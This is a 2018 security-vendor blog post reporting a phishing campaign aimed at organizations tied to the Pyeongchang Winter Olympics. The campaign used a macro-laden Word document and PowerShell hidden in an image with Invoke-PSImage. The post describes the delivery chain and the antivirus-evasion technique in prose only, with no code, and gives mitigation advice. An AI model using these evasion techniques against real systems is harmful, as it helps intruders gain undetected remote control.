Barkly vs Malware
Jonathan Crowe
Jan 2018

2018 Winter Olympics Malware Campaign  Evades Antivirus

2018-winter-olympics-malware-campaign

Photo by James Tworow

Malicious emails disguised as alerts from South Korea's National Counter-Terrorism Center are using a new fileless trick to take control over infected machines.

Researchers at McAfee are reporting a new malware campaign targeting organizations associated with the upcoming 2018 Winter Olympics in Pyeongchang, South Korea. The attack is being delivered via emails disguised to look like alerts from country's National Counter-Terrorism Center (NCTC), with malicious Word documents attached.

Experts expect Olympics-themed attacks like these to ramp up as we get closer to the Winter Olympics February 9 start date. What makes this campaign truly notable, however, is its use of a brand new PowerShell tool called Invoke-PSImage that allows attackers to hide malicious scripts inside otherwise benign-looking image files (a technique known as steganography). By hiding malicious code in this way, attackers can sneak it past many of the security solutions companies have in place. That's because it isn't possible to detect the script by simply scanning the file. 

The good news is there are steps companies can take to mitigate this threat. Feel free to skip ahead to find out what those are. Otherwise, let's take a closer look at the campaign and the use of Invoke-PSImage in action. 

The campaign's malicious emails and Word doc attachments

According to McAfee researchers, this particular campaign began on December 22, 2017 and continued through December 28. Emails were sent to several organizations with ties to the Pyeongchang Olympics and appeared to come from info@nctc.go.kr, South Korea's National Counter-Terrorism Center (NCTC). Attached to the email was a Microsoft Word document with a file name that translates to "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics."

When downloaded and opened, the document (written in Korean) informs the reader they need to enable content in order for the document to be properly opened in their version of Word. 

2018-winter-olympics-malware-campaign-email.png

Fake counter-terror alert attached to emails targeting organizations associated with the 2018 Winter Olympics

Enabling content activates an obfuscated Visual Basic macro embedded in the Word document. That, in turn, launches a PowerShell script that downloads the image file below:

2018-Winter-Olympics-malware-campaign-image.pngAttackers have hidden yet another malicious script inside that image using an open source PowerShell module called Invoke-PSImage. As the McAfee researchers pointed out, what makes this especially troubling is Invoke-PSImage had been available for less than a week before attackers began using it in this campaign. 

That underscores just how quickly attackers are able to adapt and incorporate new attack tools and exploits into their campaigns. 

Using Invoke-PSImage to hide malicious scripts in plain sight

Before we explain how Invoke-PSImage works, it's worth pointing out the module  appears to have been built as a penetration testing tool with perfectly legitimate use cases. Unfortunately, as this malware campaign shows, criminals clearly don't hesitate to put such tools to malicious use. 

That said, here are the basic details:

  • What Invoke-PSImage is: An open source PowerShell module.
  • What it does: Allows you to embed a PowerShell script in the pixels of a PNG file and later execute it by running it directly from memory rather than writing it to disk.
  • Why that's dangerous: Not only does hiding the script inside an image file help it evade detection, executing it directly from memory is a fileless technique that generally won't get picked up by antivirus solutions.
  • No download necessary: Invoke-PSImage can be used to extract scripts from downloaded images or images hosted on the web. That means an attacker doesn't necessarily need to download an image onto a machine in order to get a script embedded inside it to run on that machine. 

In the case of this particular malware campaign, the image file is downloaded to the victim machine. Once extracted, the embedded script is passed to the Windows command line and executed via PowerShell. 

McAfee researchers note that the script is heavily obfuscated, but "because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly."

Based on their analysis, it appears the objective of the script is to establish an encrypted channel to the attacker's server that allows them to remote execute commands and/or install additional malware. 

Why this attack spells trouble for AVs

This campaign is another example of just how important it is to have mitigations and protection in place that blocks attacks before they get past the initial delivery stage. Once that stage is complete, attackers have become increasingly good at "living off the land" — abusing legitimate tools like PowerShell already present on the system in order to carry out post-exploitation activities without being noticed. 

In the past, we've seen many attacks abusing PowerShell follow a tried-and-true pattern:

Spam email with Word attachment > Word attachment with embedded macro > Macro launches PowerShell script > PowerShell script downloads and executes malware payload

In these scenarios, traditional antivirus solutions have a chance of scanning and blocking the attack, but not until the very last step. Once the malware payload has been downloaded onto the device the AV might be able to block it, but only if the malware has been seen before and the AV has a signature it can refer to in order to identify it. In these scenarios, we've seen plenty of instances where the AV misses and the infection is successful.

This malware campaign presents an even worse scenario in which the AV doesn't have the opportunity to do anything at all:

Spam email with Word attachment > Word attachment with embedded macro > Macro launches PowerShell script > PowerShell script extracts 2nd PowerShell script from image and executes it from memory > In-memory executed script gives attacker remote access and control

With no malicious executable file to scan, this attack will slip past AV solutions and be successful unless other protections are in place. 

Blocking script-based attacks that AVs miss

Winter-Olympics-Malware-Campaign-Attack-Diagram.gifTo prevent attacks like this from doing damage, Barkly focuses on stopping them at the earliest opportunity. In this case, because Barkly's ProtectIQ engine provides protection against malicious macros and scripts, it's able to stop the attack as soon as it sees the malicious macro attempting to launch PowerShell from Word. 

Barkly-vs-Olympic-Malware.gifThat means Invoke-PSImage never even comes into play. 

But let's say an attack was able to progress to the point where it could leverage Invoke-PSImage. Barkly would still provide protection against a wide variety of malicious PowerShell scripts, thanks to its behavior-based rules that block malicious activity (we confirmed this first hand by using Invoke-PSimage to embed and extract a variety of malicious scripts on our testing machines). 

In addition to using Barkly, there are three additional things companies can do to mitigate their risk:

  • Remind employees not to open email attachments from senders they don't know: They should be especially wary of Word documents that ask them to enable content/macros.   
  • Better yet, enforce stricter macro controls: For starters, consider blocking macros in Office files downloaded from the Internet.
  • Disable or restrict PowerShell: If PowerShell isn't being used for something vital on a machine, disable it. If it is being used for something vital, consider using PowerShell Constrained Language Mode. That will limit PowerShell to its most basic functionality and make many fileless attack techniques unusable. 

For more tips on preventing and mitigating advanced fileless attacks, download our Fileless Attack Checklist. 

Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.

blocks-attack-grey-circle.svg

Close the gaps in your security

See how Barkly blocks attacks other solutions miss.

See a demo

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.